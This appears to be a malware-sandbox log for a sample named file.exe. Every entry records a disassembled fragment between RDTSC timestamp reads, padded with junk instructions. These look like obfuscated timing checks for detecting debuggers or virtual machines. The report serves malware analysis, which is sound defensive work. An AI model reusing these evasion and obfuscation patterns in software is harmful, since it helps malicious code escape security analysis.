                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04532 second address: F04566 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4178B56568h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e mov dword ptr [ebp+122D254Ah], ecx 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 or dword ptr [ebp+122D231Bh], ecx 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 mov esi, dword ptr [ebp+122D275Dh] 0x00000026 mov esi, dword ptr [ebp+122D3849h] 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0386A second address: F0386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04566 second address: F04570 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F047E9 second address: F04812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F417883CDD7h 0x0000000c popad 0x0000000d push eax 0x0000000e jbe 00007F417883CDD4h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F064F7 second address: F06592 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F4178B56568h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F4178B56574h 0x0000002d call 00007F4178B56570h 0x00000032 mov edi, dword ptr [ebp+122D368Dh] 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b sub dword ptr [ebp+122D227Dh], ebx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F4178B56568h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d call 00007F4178B5656Ah 0x00000062 mov ebx, dword ptr [ebp+1244D0CCh] 0x00000068 pop edi 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F056F1 second address: F056FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F06592 second address: F06596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F06596 second address: F0659C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0659C second address: F065B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56574h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F065B4 second address: F065D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F417883CDD8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F065D7 second address: F065DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B695 second address: F0B6A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C67E second address: F0C713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F4178B56568h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 mov ebx, edx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F4178B56568h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov di, cx 0x0000004b xchg eax, esi 0x0000004c jmp 00007F4178B56571h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ecx 0x00000055 jmp 00007F4178B56571h 0x0000005a pop ecx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C713 second address: F0C719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08905 second address: F08909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09A66 second address: F09A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B87D second address: F0B888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4178B56566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B888 second address: F0B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D6A9 second address: F0D6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4178B56575h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B895 second address: F0B89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D6C9 second address: F0D72C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4178B56578h 0x00000008 jmp 00007F4178B56572h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 jng 00007F4178B56566h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 mov dword ptr [ebp+122D1E69h], edi 0x0000001f pop ebx 0x00000020 mov dword ptr [ebp+12453C40h], edx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F4178B56568h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 add dword ptr [ebp+122D320Eh], edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D72C second address: F0D732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17C23 second address: F17C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17C29 second address: F17C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F417883CDD5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17C44 second address: F17C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F4178B56566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F2A second address: F17F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F417883CDC6h 0x00000009 jng 00007F417883CDC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F3B second address: F17F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jo 00007F4178B56566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC42 second address: F1DC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC46 second address: F1DC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC4C second address: F1DC9E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F417883CDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F417883CDD8h 0x00000011 pushad 0x00000012 jne 00007F417883CDC6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F417883CDCBh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC9E second address: F1DCBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F4178B56566h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DCBF second address: F1DCC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DCC5 second address: F1DCDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jg 00007F4178B56574h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F23E87 second address: F23E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB39DD second address: EB39E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4178B56566h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2321C second address: F23220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F234E0 second address: F234EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jno 00007F4178B56566h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2367F second address: F23698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCDh 0x00000007 js 00007F417883CDCEh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F23BA6 second address: F23BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F23CE3 second address: F23CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F290A2 second address: F290AC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27F09 second address: F27F13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F417883CDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27F13 second address: F27F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56570h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27F28 second address: F27F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jc 00007F417883CDC6h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCBAC second address: EFCBC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCBC7 second address: EFCBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCCB1 second address: EFCCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCCB6 second address: EFCCBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCD7E second address: EFCD98 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4178B5656Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCFC8 second address: EFD019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a xchg eax, esi 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F417883CDC8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jmp 00007F417883CDCFh 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD103 second address: EFD107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD2E1 second address: EFD333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F417883CDD0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 or cx, EB70h 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F417883CDC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 sub dword ptr [ebp+12453D93h], edx 0x00000037 add edx, dword ptr [ebp+122DB75Fh] 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 push esi 0x00000041 pop esi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD333 second address: EFD33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD7D3 second address: EFD7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD7D7 second address: EFD7DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD998 second address: EFD99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD99D second address: EFD9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56575h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDA73 second address: EFDAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F417883CDD7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDAA0 second address: EFDAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDAA6 second address: EFDAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281B3 second address: F281B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281B7 second address: F281BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281BD second address: F281C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281C9 second address: F281EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F417883CDC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281EC second address: F281FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281FF second address: F28203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28203 second address: F28207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28207 second address: F2820D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28BD4 second address: F28BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56576h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28BEE second address: F28BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28BF8 second address: F28C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56576h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28C12 second address: F28C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E93E second address: F2E9A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a ja 00007F4178B56566h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F4178B565BBh 0x00000019 js 00007F4178B56591h 0x0000001f jmp 00007F4178B56574h 0x00000024 jmp 00007F4178B56577h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4178B56570h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E9A3 second address: F2E9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E9A7 second address: F2E9AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2EF1B second address: F2EF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F1D4 second address: F2F1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4178B5656Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F36D16 second address: F36D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F36D1A second address: F36D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F371D0 second address: F371D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C768 second address: F3C76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C76D second address: F3C772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C772 second address: F3C780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4178B56566h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EFA6 second address: F3EFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F431CC second address: F431D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42D3B second address: F42D4E instructions: 0x00000000 rdtsc 0x00000002 js 00007F417883CDCEh 0x00000008 jl 00007F417883CDC6h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46BC8 second address: F46BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4178B56566h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F4178B56566h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46E87 second address: F46E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46E8F second address: F46E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DCFE second address: F4DD37 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F417883CDC8h 0x00000008 jmp 00007F417883CDD7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F417883CDCBh 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F417883CDC6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
